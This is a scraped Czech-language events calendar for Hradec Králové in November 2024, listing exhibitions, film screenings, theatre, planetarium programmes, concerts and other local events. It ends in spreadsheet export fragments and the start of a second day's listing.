střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 09.listopadu - sobota od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala . 09.listopadu - sobota od 09:00 hodin pro děti mladšího školního věku i dospělé Hradí se vstupné: nečlen/ka 100 Kč, člen/ka 80 Kč, člen/ka Plus 60 Kč, studenti a senioři 60 Kč. Lektor Petr Sejkora. Pokud máte možnost, přineste si ruční pilku na dřevo, ostatní pomůcky zajištěny. Hlídání dětí zajištěno. Je třeba se přihlásit nejpozději do čtvrtka 7. listopadu přes: https://www.sedmikraskahk.cz/rezervacni-system. 09.listopadu - sobota od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. Pohádky v AdaluVhodné pro děti od 4 let. 09.listopadu - sobota od 10:00 hodin Veselé činoherní představení tří klasických pohádek v příběhu hlavních hrdinů – Lízy a Lojzy. Špetka strachu a hromada legrace se známými písničkami od táboráků a 18 loutkami nejrůznějších druhů. Účinkuje Divadýlko MRAK. Určeno dětem od čtyř let. * V sále je volný zasedací pořádek. * Vstupenku do sálu musí mít dětský i dospělý divák. Pokud je divákem dítě mladší dvou let, má vstup zdarma, ovšem bez nároku na místo. * Prosíme dospělé diváky, aby při výběru míst brali ohled na ty malé, kterým by případně mohli bránit ve výhledu. Děkujeme za vstřícnost a těšíme se na Vaši návštěvu! 09.listopadu - sobota od 10:00 hodin DIZAJNIŠTĚ - Krátkodobá výstava Kreativní hřiště pro malé i velké Kurátor: Tereza Vlašímská Vyrobily dílny Divadla Drak: Roman Beran, Michaela Kudelková, Hana Kopová, Layla Hruška Ottová, Štěpán Uherka Grafické úpravy: Jindřich Max Pavlíček Produkce: Barbora Kalinová, Martina Štětinová Technické řešení: Petr Seiner Světla: Libor Petr Lektorský program: Kateřina Hanková, Jana Neduha, Klára Fidlerová, Klára Svobodová Interaktivní výstava Dizajniště hravou formou seznamuje s metodou designového myšlení a krok za krokem děti naučí, jak myslet a navrhovat jako designér. Výstava provede návštěvníky cestou od designového nápadu až k jeho realizaci pomocí designového myšlení. Prostřednictvím jednoduchého návodu s pěti fázemi - empatie, definice, ideace, prototyp, testování - mohou účastníci ve své práci i každodenním životě objevovat nová kreativní řešení a zažít přitom spoustu tvůrčího dobrodružství. Designové myšlení učí kreativnímu řešení problémů, generování nápadů a schopnostem je vyhodnocovat, rozvíjí komunikační a prezentační dovednosti, podporuje práci v kolektivu, je inkluzivní, je zábavné, poučné a hravé. Pro školní kolektivy nabízíme lektorské programy, které návštěvníky provedou je celým kreativním procesem. Žáci a studenti si na nich osvojí sběr, třídění, analyzování a vyhodnocování informací a jak je mohou tvůrčím způsobem aplikovat v nových souvislostech a situacích. V pěti krocích se dostanou od nápadu k až realizaci. Účastníci přirozeně rozvinou celou řadu důležitých kompetencí: týmovou spolupráci, prezentaci, komunikaci a vizualizaci myšlenek, argumentaci, vedení diskuse i polemiky. Designové myšlení spojuje, narušuje bariéry mezi lidmi a přispívá k sebenaplnění. Lektorské programy pro školní kolektivy jsou uzpůsobeny různým věkovým kategoriím návštěvníků základních i středních škol. Autory expozice jsou designoví aktivisté, kreativci a patrioti z karlovarského spolku PROTEBE live, který již od roku 2005 buduje image Karlových Varů jako kulturního a občansky aktivního města. K tomu nemalou měrou pomáhá jejich kreativní centrum DIZAJNPARK v prostorách tuhnického výměníku. PŘÍBĚH DRAKU 1958-2018 - Stálá expozice Koncepce a libreto výstavy: Tomáš Jarkovský Návrh a realizace instalací: Tereza Vašíčková Odborná konzultace: Miloslav Klíma Spolupráce na instalaci: Dílny a technici Divadla Drak Určeno pro celou rodinu. Výstava Příběh Draku 1958–2018 vypráví příběh 60leté historie Divadla Drak. Prostřednictvím vystavených loutek, fotografií, scénografických návrhů, ukázek z inscenací a dalších dobových materiálů zachycuje proměny drakovského divadelního jazyka a zároveň přibližuje nezaměnitelnou atmosféru divadla. Představuje Drak jako místo tvorby, ale také jako křižovatku osudů těch, kteří jeho příběh po 60 let spoluvytvářeli. Expozice se skládá z 31 zastavení věnovaných významným inscenacím, osobnostem nebo událostem v historii divadla, která jsou rozdělena do osmi tematických celků. Prvních pět je řazeno chronologicky a vypraví příběh divadla od jeho počátků až k oslavám 60. výročí založení. Připomíná důležité milníky historie Draku a představuje významné inscenace či osobnosti, které jsou s jednotlivými etapami vývoje divadla spojeny. Poslední tři části-zastavení představující kompletní výpravu legendární inscenace O Sněhurce, unikátní dokument Jana Špáty a bilanci bohaté zájezdové činnosti divadla pak společně tvoří jakýsi epilog výstavy. Stručný komentář ke každému zastavení naleznete spolu s orientační mapkou v tištěném průvodci výstavou. Výstava byla realizována s finanční podporou Nadace ČEZ . The Wild Robot 09.listopadu - sobota od 10:30 hodin Co se stane robotovi, když se ocitne na opuštěném ostrově? Studio DreamWorks Animation , tvůrci série Jak vycvičit draka, v animovaném dobrodružství Rozzum v divočině tvrdí, že tu může najít srdce. Robotka z výrobní řady typu Rozzum (pro přátele Roz) byla zkonstruována, aby spolehlivě plnila úkoly od svých lidských zadavatelů. Když ovšem vinou nehody ztroskotá na ostrově, kde žádní lidé nejsou, netuší, co si s nabytou svobodou počít. A také se musí naučit, jak se adaptovat na nehostinné podmínky hroudy hlíny uprostřed oceánu obývané jen zvířaty. Roz má naštěstí natolik pokročilý software, že se naučí se zdejšími obyvateli komunikovat a spolupracovat, dokonce se stane adoptivní mámou osiřelého housete. Všechny její zdejší zážitky postupně vedou k tomu, že tam, kde dřív byl jen bezchybný počítačový program, jsou teď myšlenky, názory, nápady a hlavně city, které můžou být občas i nedokonalé. Robotí holka ve světě bez lidí zkrátka zlidštěla. Bohužel ji trochu dělají starosti její výrobci, kterým chybí jeden stroj a usilovně po něm pátrají, a pak taky její adoptivní ptačí synátor. Toho musí připravit na odlet do teplých krajin, než přijde zima. Film Rozzum v divočině je adaptací světového bestselleru spisovatele Petera Browna . Jméno hlavní hrdinky nese českou stopu, když odkazuje ke Karlovi Čapkovi a Rossumovým universálním robotům z jeho divadelní hry R. U. R. Režisér Chris Sanders (tvůrce filmů Jak vycvičit draka a Croodsovi) objevil knižní předlohu díky dceřině domácímu úkolu a okamžitě se do ní zamiloval. „I já mám rád velké dobrodružné příběhy, ale ještě víc mě těší, když v nich můžu pozorovat drobné, až intimní emocionální momenty, které si odnesete kina. Na tyhle scény se rád soustředím i jako tvůrce a tady jsem si to užil vrchovatě,“ říká režisér Sanders. 100 vstupné 100 Kč | Velký sál | Bio Central Velký sál 2024-11-09 11:00:00 2024-11-09 11:00:00 09.listopadu - sobota od 11:00 hodin 9. 10. - 30. 11. 2024 Vernisáž výstavy 9. října v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 / So 11 - 16 hod. Galerie Koruna, Rokitanského 169 (Svatojánské náměstí), 500 03 Hradec Králové tel.: +420495513009 VÝSTAVA MODELŮ ŽELEZNIC 09.listopadu - sobota od 11:31 hodin Od 9. Do 17. listopadu 2024 se na královéhradeckém hlavním nádraží uskuteční tradiční – letos již 39. výstava železničních modelů a kolejišť s mezinárodní účastí. Návštěvníci zde uvidí nejen modely od našich modelářů, ale například i kolejiště od německého kolegy a kolejiště velikosti TT od firmy Tillig. Ve spolupráci s německým Saským svazem modelářů bude stejně jako v loňském roce k dispozici dílnička pro nejmenší modeláře, kde si pod odborným vedením mohou postavit například domeček a ten si pak samozřejmě odnést na památku domů. V provozu bude velké klubové kolejiště HO – Velký Brod, tradiční kolejiště s motivem Ameriky a další menší, z nichž zajímavé bude určitě kolejiště ze stavebnice LEGO. Celkem se na výstavě budou malé vláčky prohánět na sedmi kolejištích. Pro ty nejmenší děti bude k dispozici v minulých letech velmi oblíbený hrací koutek, kam mohou dospěláci případně „odložit“ své ratolesti a v klidu si prohlédnout výstavu. Statické modely, ať už tovární, či našich modelářů budou ke zhlédnutí ve vitrínách a v případě zájmu bude možné v prodejně na místě zakoupit nejen některé nové i použité tovární modely, ale třeba i omalovánky, vystřihovánky a klubový stolní kalendář na rok 2025. Ten bude možné i vyhrát v případě, že na zadní stranu vstupenky napíšete své telefonní číslo a vhodíte ji při odchodu do schránky u pokladny. Každý den se na jednoho návštěvníka usměje štěstí v podobě tohoto kalendáře. Přístup na výstavu je z 1. nástupiště ve všední dny od 14 do 18 hodin, o víkendu a ve svátek od 9 do 18 hodin. Dopolední hodiny ve všedních dnech jsou vyhrazeny pro předem objednané skupiny školních či předškolních dětí a jsou doplněny i programem. Objednat prohlídku je možné telefonicky nebo SMS zprávou na čísle 602 406 234. Vstupné na výstavu je pro dospělého 100 Kč a pro děti 50 Kč. The Wild Robot 09.listopadu - sobota od 13:00 hodin Co se stane robotovi, když se ocitne na opuštěném ostrově? Studio DreamWorks Animation , tvůrci série Jak vycvičit draka, v animovaném dobrodružství Rozzum v divočině tvrdí, že tu může najít srdce. Robotka z výrobní řady typu Rozzum (pro přátele Roz) byla zkonstruována, aby spolehlivě plnila úkoly od svých lidských zadavatelů. Když ovšem vinou nehody ztroskotá na ostrově, kde žádní lidé nejsou, netuší, co si s nabytou svobodou počít. A také se musí naučit, jak se adaptovat na nehostinné podmínky hroudy hlíny uprostřed oceánu obývané jen zvířaty. Roz má naštěstí natolik pokročilý software, že se naučí se zdejšími obyvateli komunikovat a spolupracovat, dokonce se stane adoptivní mámou osiřelého housete. Všechny její zdejší zážitky postupně vedou k tomu, že tam, kde dřív byl jen bezchybný počítačový program, jsou teď myšlenky, názory, nápady a hlavně city, které můžou být občas i nedokonalé. Robotí holka ve světě bez lidí zkrátka zlidštěla. Bohužel ji trochu dělají starosti její výrobci, kterým chybí jeden stroj a usilovně po něm pátrají, a pak taky její adoptivní ptačí synátor. Toho musí připravit na odlet do teplých krajin, než přijde zima. Film Rozzum v divočině je adaptací světového bestselleru spisovatele Petera Browna . Jméno hlavní hrdinky nese českou stopu, když odkazuje ke Karlovi Čapkovi a Rossumovým universálním robotům z jeho divadelní hry R. U. R. Režisér Chris Sanders (tvůrce filmů Jak vycvičit draka a Croodsovi) objevil knižní předlohu díky dceřině domácímu úkolu a okamžitě se do ní zamiloval. „I já mám rád velké dobrodružné příběhy, ale ještě víc mě těší, když v nich můžu pozorovat drobné, až intimní emocionální momenty, které si odnesete kina. Na tyhle scény se rád soustředím i jako tvůrce a tady jsem si to užil vrchovatě,“ říká režisér Sanders. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-09 13:30:00 2024-11-09 14:56:00 My Freaky Family 09.listopadu - sobota od 13:30 hodin Betty Flood je obyčejná holka, která žije se svou kouzelnickou rodinou ve světě lidí. Jako jediná z nich však nemá žádnou magickou moc. Netušila ale, že její rodina má své důvody, proč Betty nezasvětili do světa kouzel. Za jejich zády se tak do tohoto světa vydá, kvůli čemuž přivede svou rodinu do nebezpečí. Dokáže objevit své magické schopnosti, aby zachránila rodinu před čarodějem králem Murkhartem? Čeká na vás příběh plný kouzel, hudby a úžasných dobrodružství. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-09 15:00:00 2024-11-09 16:20:00 Living LargeŽivot k sežrání 09.listopadu - sobota od 15:00 hodin Raz dva, raz dva… zkouška mikrofonu. Dvanáctiletý Ben nadevše miluje nejen muziku, ale i jídlo a vaření. A je to na něm taky znát. Když se ale jednoho dne zabouchne do spolužačky Klárky, rozhodne se s kily navíc zatočit. Na cestě za vysněnou postavou i Klárčiným srdcem mu pomáhají hlavně kamarádi z kapely a starostlivá maminka. Animovaný film režisérky Kristiny Dufkové natočený podle knižního bestselleru Mikaëla Olliviera s humorem za doprovodu nadupaných songů sleduje první strasti, lásky i nástrahy dospívání. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-09 15:30:00 2024-11-09 17:00:00 09.listopadu - sobota od 15:30 hodin astronomická pohádka Oříšky - Hledání dokonalé planety, hvězdná obloha s živým výkladem lektora digitální planetárium a hvězdárna 90 minut pořad vhodný pro diváky od 8 let v doprovodu dospělé osoby V digitálním planetáriu se nejprve podíváme na hvězdnou oblohu a souhvězdí. Následně se proletíme vesmírem. V poslední části programu se podíváme na astronomickou pohádku Oříšky - Hledání dokonalé planety. Následně je možné navštívit ještě budovu hvězdárny. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. The Wild Robot 09.listopadu - sobota od 15:30 hodin Co se stane robotovi, když se ocitne na opuštěném ostrově? Studio DreamWorks Animation , tvůrci série Jak vycvičit draka, v animovaném dobrodružství Rozzum v divočině tvrdí, že tu může najít srdce. Robotka z výrobní řady typu Rozzum (pro přátele Roz) byla zkonstruována, aby spolehlivě plnila úkoly od svých lidských zadavatelů. Když ovšem vinou nehody ztroskotá na ostrově, kde žádní lidé nejsou, netuší, co si s nabytou svobodou počít. A také se musí naučit, jak se adaptovat na nehostinné podmínky hroudy hlíny uprostřed oceánu obývané jen zvířaty. Roz má naštěstí natolik pokročilý software, že se naučí se zdejšími obyvateli komunikovat a spolupracovat, dokonce se stane adoptivní mámou osiřelého housete. Všechny její zdejší zážitky postupně vedou k tomu, že tam, kde dřív byl jen bezchybný počítačový program, jsou teď myšlenky, názory, nápady a hlavně city, které můžou být občas i nedokonalé. Robotí holka ve světě bez lidí zkrátka zlidštěla. Bohužel ji trochu dělají starosti její výrobci, kterým chybí jeden stroj a usilovně po něm pátrají, a pak taky její adoptivní ptačí synátor. Toho musí připravit na odlet do teplých krajin, než přijde zima. Film Rozzum v divočině je adaptací světového bestselleru spisovatele Petera Browna . Jméno hlavní hrdinky nese českou stopu, když odkazuje ke Karlovi Čapkovi a Rossumovým universálním robotům z jeho divadelní hry R. U. R. Režisér Chris Sanders (tvůrce filmů Jak vycvičit draka a Croodsovi) objevil knižní předlohu díky dceřině domácímu úkolu a okamžitě se do ní zamiloval. „I já mám rád velké dobrodružné příběhy, ale ještě víc mě těší, když v nich můžu pozorovat drobné, až intimní emocionální momenty, které si odnesete kina. Na tyhle scény se rád soustředím i jako tvůrce a tady jsem si to užil vrchovatě,“ říká režisér Sanders. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-09 16:00:00 2024-11-09 16:45:00 Poetická groteska o nezvyklé návštěvě 09.listopadu - sobota od 16:00 hodin Poetická groteska o nezvyklé návštěvě. Koncept, režie a choreografie: Veronika Poldauf Riedlbauchová Scéna a kostýmy: Marianna Stránská Hudba a sound design: Jan Čtvrtník Dramaturgie: Tomáš Jarkovský, Barbora Pokorná Produkce: Barbora Kalinová Výkonná produkce: Martina Štětinová Hrají: Petra Cicáková, Luděk Smadiš, Edita Dohnálková Valášek a Šimon Dohnálek Představte si, že vám takhle jednoho dne zničehonic spadne domů anděl. Kde se vzal, tu se vzal. Ještě před chvílí si poletoval někde nad oblaky a najednou je tady. Našemu světu nerozumí, jeho pravidla nezná a rád by se vrátil zase zpátky. Ale jak se to dělá? Jak mu jen pomoci? Snad by mohla poradit maminka, jenže ta celé té historce nějak nechce věřit. A přitom ten anděl je tady. Každý ho vidí, každý ho slyší, nikdo ho nemůže přehlédnout. Nebo může? Nová autorská inscenace na pomezí poetického fyzického divadla a klaunské grotesky od osvědčeného tvůrčího tria Riedlbauchová – Stránská – Čtvrtník , které už pro Divadlo Drak připravilo úspěšnou a cenami ověnčenou inscenaci Do hajan!. V jejich nové inscenaci se vedle Petry Cicákové a Luďka Smadiše, kteří už svůj mimořádný pohybový um i cit pro gag bohatě předvedli právě v Hajanech , představí i dva nejmladší členové drakovského souboru, Edita Dohnálková Valášek a Šimon Dohnálek. Délka představení: 45 minut Určeno divákům od 3 let. 09.listopadu - sobota od 17:00 hodin 21. ročník Město plné lampionů je tu. Rádi bychom Vás pozvali na tradiční lampionový průvod, který se koná 9. 11. od 17:00 h. Začátek průvodu bude v Jiráskových sadech přes most u Hučáku a poté půjdeme celou dobu podél řeky Labe až na Smetanovo nábřeží ke kotvišti parníčků. Zde si na závěr užijeme ohňostroj, který vypukne na druhé straně řeky na Eliščině nábřeží. William ShakespeareRežie: Pavel Khek 09.listopadu - sobota od 17:30 hodin Představte si, že jste první divák Hamleta – ten, který ještě neví, jak to dopadne…? Nevíte, zda Duch nelže, zda Claudius opravdu zavraždil Hamletova otce, zda v tom měla Gertruda prsty či zda se s Ofélií skutečně prolomila větev – nebo jí někdo pomohl? Je Hamlet spravedlivý princ vykonávající pomstu anebo blázen, který vidí ďáblů víc, než peklo obsáhne? Zkuste si představit, že netušíte, jak tahle detektivka skončí – a vůbec… víte, jak to dopadne? Přijďte společně znovuobjevit tajemství nejlepší hry, která kdy byla napsána. Co to znamená být dneska jiný? Co když nás okolí považuje za blázna, podivína, zkrátka tak trochu magora? Jak se dá bojovat proti lži a přetvářce? A je pomsta vždycky to správné řešení? Hamlet jako sonda do nitra současného mladého člověka, který čelí tlaku okolí - protože rodiče pro nás chtějí vždycky to nejlepší. Nebo spíš pro sebe? Délka představení 2:45 s přestávkou. 320 vstupné 280 Kč, 320 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-11-09 17:30:00 2024-11-09 19:10:00 State of EmergencyVýjimečný stav 09.listopadu - sobota od 17:30 hodin Rozhlasový zpravodaj na Blízkém východě Karel Beran přijíždí na základě anonymu na otočku soukromě do Prahy . V Kamburu, který neprofesionálně opustil, však právě ve stejnou chvíli vypuká revoluce. Dostát povinnosti reportéra donutí zkušeného profesionála k mystifikačním reportážím, kdy vřavu arabské revoluce simuluje na kuchyňských spotřebičích ve vinohradském bytě. Rozkročen mezi řešením osobního problému a povinností zpravodajsky informovat posluchače se však chytne do vlastní pasti. Když se na základě vysoce sledovaných příspěvků rozhodně Český rozhlas poslat za zpravodajem podpůrný tým, ocitne se před neřešitelnou volbou: buď se přizná k mediálnímu podvodu, nebo musí předstírat vlastní smrt. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-09 18:00:00 2024-11-09 18:00:00 ULRICHOVO NÁMĚSTÍ 09.listopadu - sobota od 18:00 hodin Svatý Martin letos nepřiveze jenom sníh, ale i první koncert uvnitř DIONU. Navštíví nás blues-rocková kapela Ulrichovo náměstí ! 9. 11. 2024. Ulrichovo náměstí hraje pro všechny, kteří si rádi poslechnou rockovou muziku s bluesovými prvky. Produkce kapely je založena především na repertoáru kapel ETC,... a Krausberry . Hranice jejího záběru však nejsou striktně omezeny. Kapela u nás vystoupí jako PRVNÍ po znovu otevření prostorů bývalého Satchma. Odstartuje s námi naši cestu za multi žánrovými událostmi, kterých bude už jenom a pouze přibývat! Nebude chybět ani tematické menu. Svatomartinská a mladá vína , například z vinařství Kubík či Veverka a mnohé další. K zakousnutí naše paštika s čerstvým chlebem a čatní. Svatomartinské rohlíčky s ořechovou náplní, které by vaše chuťové pohárky ideálně připravily na likérový ořechový digestiv. Jelikož už nám chybí pouze kachna s nasládlým červeným zelím, nahradíme ho naší speciální margaritou. V ní totiž dominuje voňavá skořice. Vstupné (180 Kč) se bude platit na místě. V případě, že budete chtít mít jistá místa na sezení, neváhejte psát či volat o rezervace. Přesto, že si předem nemusíte rezervovat lístky a místa na stání, budeme rádi za info, že s vámi můžeme počítat. Těšíme se na Vás. War CorrespondentVálečný zpravodaj 09.listopadu - sobota od 18:00 hodin Celovečerní dokument přináší pohled na život a práci jednoho z nejvýznamnějších českých válečných zpravodajů Martina Dorazína . Znepokojující snímek režisérů Davida Čálka , Benjamina Tučka a producenta Václava Flegla vypráví osudy lidí, které válka přímo zasahuje, nabízí pohled na současný konflikt na Ukrajině , upozorňuje na širší kontext války a na význam válečné žurnalistiky. Prostřednictvím reportéra Martina Dorazína , skrz jeho postavu, objevujeme běžný život obyčejných lidí, dlouhodobě vystavených dopadům války. Ukazujeme sílu, která ve skutečnosti rozhoduje války. Není to vítězství na frontě, ale odolnost zázemí – ať už zvítězí jakákoli strana, lidé budou stejně pořád žít tam, kde žili. Téma odolnosti společnosti objevujeme očima válečného zpravodaje, prostřednictvím jeho práce se zvukem v rozhlasových reportážích. Ve filmu odkazujeme i na mimoválečný kontext – společnost je tak silná, jak silný je její nejslabší jedinec. Prohra většinou nenastává tam, kde se lidi semkli, protože samotné semknutí zvyšuje šanci na přežití celku. To je téma, které promlouvá i ke společnosti, válkou přímo neohrožené. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-09 18:30:00 2024-11-09 20:00:00 09.listopadu - sobota od 18:30 hodin · hvězdná obloha, virtuální vesmír a celooblohová filmová projekce Jiné světy · digitální planetárium · 90 minut · pořad vhodný pro dospělé a mládež od staršího školního věku V digitálním planetáriu se nejprve podíváme na aktuální noční oblohu bez světelného znečištění. Následně podnikneme virtuální cestu do vesmíru. V poslední části programu zhlédneme celooblohovou filmovou projekci Jiné světy. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Dodržujte pokyny pracovníků zajišťujících program, ustanovení Návštěvního řádu a aktuálně obecně platná opatření či doporučení. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Snížené vstupné na programy Hvězdárny a planetária v Hradci Králové je určeno pro děti do 10 let, žáky a studenty od 10 do 26 let, držitele průkazek ZTP/P a seniory od 65 let. 09.listopadu - sobota od 19:00 hodin Wohnout se vrací už na podzim tohoto roku do Hradce Králové ! 19.00h pouštění do sálu: 20.00-20.40h koncert předkapela Gender Question 20.40-21.00h přestavba 21.00h-22.40h koncert Wohnout 22:40h - 04:00h after party cz/sk s DJ *změna harmonogramu vyhrazena 09.listopadu - sobota od 19:00 hodin Zveme vás na 5. ročník boxerského galavečera do prostor PETROF Gallery. Strhující boxerské zápasy v elegantním prostředí koncertní síně PETROF Hall, to je již tradiční Hradecký Galavečer Boxu MBC International . Na pátém ročníku oblíbené gala akce uvidíte elitní olympijský box v podobě finále poháru Antonína Petrofa a také ostrou desetikolovou bitvu o titul profesionálního mistra ČR v lehké welterové váze. Tomáš RálišRežie: Tomáš Ráliš 09.listopadu - sobota od 19:00 hodin Nová hra talentovaného režiséra a dramatika Tomáše Ráliše, trojnásobného držitele ceny Evalda Schorma za původní divadelní hru. Mladý pár hledá byt, prostor jenom pro ně dva, kde by mohli dát růst své lásce. A ono se to povede. A brzy láska není to jediné, co roste, Na cestě je dítě. Byla chyba říct, že je to problém, že je to chyba. Je potřeba sehnat víc peněz. Je potřeba většího bytu. Je potřeba poprosit o pomoc. Temná komedie plná šéfů, kšeftařů s byty, kojeneckých lahví a botoxu. Boj o životní prostor, o větší výběh, kde by si mohly děti hrát. Věčný zápas o právo mít kde složit všechny svoje hlavy. Délka představení 95 minut bez přestávky 290 vstupné 290 Kč | STUDIO BESEDA | KLICPEROVO DIVADLO o.p.s. STUDIO BESEDA 2024-11-09 20:00:00 2024-11-09 21:30:00 09.listopadu - sobota od 20:00 hodin Nejste citlivky a chcete se pořádně zasmát? Baví vás humor drsný jako Chuck Norris v nejlepších letech? Pak jste tady správně! Zveme vás na pořádnou stand-up comedy show v Hradci Králové ve SPORTBARU HVĚZDA. Vystoupí pro vás komediální duo ROZJETÝ BRÁNICE! Tuhle dvojku tvoří: David Klouda – Bývalý 160kilový cvalík, který bůhvíproč nikdy nedělal sumo. I když hodně zhubnul, stále je hrdým tlouštíkem a také o váze bude jeho stand-up. Karel Petrdlík – Neřízená střela, která nemluví jen ve chvíli, kdy se nadechuje k dalšímu mluvení. Jako hosté vystoupí také další komici, které odhalíme později. Přijďte se pobavit, na tenhle večer jen tak nezapomenete! POČET LÍSTKŮ JE OMEZEN, JE MOŽNÉ, ŽE NA MÍSTĚ UŽ NEBUDOU K DOSTÁNÍ. Doporučujeme tedy koupit lístky v předprodeji. Těšíme se na vás a humoru zdar!!! 09.listopadu - sobota od 20:00 hodin ZuZu Kabaret poprvé přichází do Hradce Králové a slibuje vám večer, na který jen tak nezapomenete! Připravte se na okouzlující show plnou elegance a vzrušení, kde burleska, akrobatický tanec a tajemná orientální a taneční vystoupení přivedou na scénu kouzlo starých časů. Naše vystoupení vás přenese zpět do slavné éry 20. a 30. let, kdy kabarety a cirkusy byly plné krásy a emocí. Vše bude doprovázeno úžasným hlasem naší talentované zpěvačky, která dodá každému okamžiku tu pravou atmosféru. A to není vše! Po skončení hlavního programu vás čeká after party, která se protáhne až do pozdních hodin. Těšit se můžete na tombolu, soutěže a spoustu zábavy. Dress code je vítán, takže se nebojte vytáhnout své nejlepší obleky a šaty, ať společně podtrhneme jedinečnou atmosféru tohoto večera. Nenechte si ujít tuto magickou noc plnou vzrušení, zábavy a překvapení! Těšíme se na vás a slibujeme, že to bude večer, o kterém budete ještě dlouho mluvit! V programu vystoupí Elektra Show – brněnská burleska působící též na mezinárodní scéně Adel Fox – zpěvačka s úchvatným hlasem a též rodačka z Hradce Králové Creepy Clowns – akrobaticko-taneční vystoupení v páru Wild Cherries – kabaretní taneční vystoupení inspirovaná nejen muzikálovým filmem Cabaret Alesmin Fanick – orientální taneční show Betty Bombastic - burleskní umělkyně ze Slovenska Anora 09.listopadu - sobota od 20:00 hodin Proč by sexuální pracovnice nemohla toužit po opravdové lásce? Anora (Mikey Madison) je ještě tak naivní, že takový sen má. Když si v klubu její společnost objedná mladý a bohatý Rus Ivan, zajiskří to mezi nimi a po pár týdnech si říkají ano na spontánní svatbě ve Vegas . Je možné, že Anora našla svého prince na bílém koni? Ivanovi rodiče si to nemyslí. Strhující, vtipná a šílená jízda režiséra Seana Bakera (The Florida Project) získala Zlatou palmu v Cannes a první diváci ji označují za minimálně stejně zábavnou podívanou jakou je jiný vítěz stejné ceny, Trojúhelník smutku. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-09 20:30:00 2024-11-09 22:50:00 The Substance 09.listopadu - sobota od 20:30 hodin eden z nejdiskutovanějších filmů letošního roku vyháněl diváky ze sálu na všech letních filmových festivalech. Jak zapůsobí na vás? Satirický horor režisérky Coralie Fargeat si na festivalu Future Gate můžete užít v předpremiéře. Stárnoucí hvězda televizních obrazovek Elisabeth Sparkle ( Demi Moore ) dostává možnost vyzkoušet zázračnou substanci, díky které může být mladší a krásnější. Touha změnit přirozený chod věcí ale nikdy není jen tak, proto to má háček – Elisabeth se se svým novým, lepším já (Margaret Qualley) musí dělit o čas. Šokující satiru tematizující naši posedlost dokonalostí musíte vidět, pokud chcete být v obraze. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_636_3239872459_ce9142048f185da49da0.html</t>
  </si>
  <si>
    <t>ce9142048f185da49da0</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 25. 11. 2024 2024-11-15 00:00:00 2025-01-17 18:00:00 PREMIÉRA 2024 25.listopadu - pondělí od 00:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. UNIVERZITA HRADEC KRÁLOVÉ: DNES SLAVÍ! 25.listopadu - pondělí od 00:01 hodin Dovolujeme si vás pozvat na výstavu prací studentů 2. ročníku oboru Grafická a intermediální tvorba Katedry výtvarné kultury a textilní tvorby PF UHK, kteří představí výběr plakátů k oslavám 75. výročí založení Studijní a vědecké knihovny v Hradci Králové . Práce vznikly ve spolupráci se SVK HK. Práce můžete vidět v prostoru budovy už 8. 11. Výstavu najdete ve 2. NP v galerii Automat. SALON VÝCHODOČESKÉ FOTOGRAFIE 25.listopadu - pondělí od 00:01 hodin Výstava 7. ročníku Salonu východočeské fotografie, vyhledávané přehlídky, která se koná jednou za tři roky, a je výběrovým přehledem aktuální tvorby fotografů nejen východních Čech . Své fotografie zde vystaví 41 autorů a 6 hostů (Radek Kalhous, Martina Kopecká 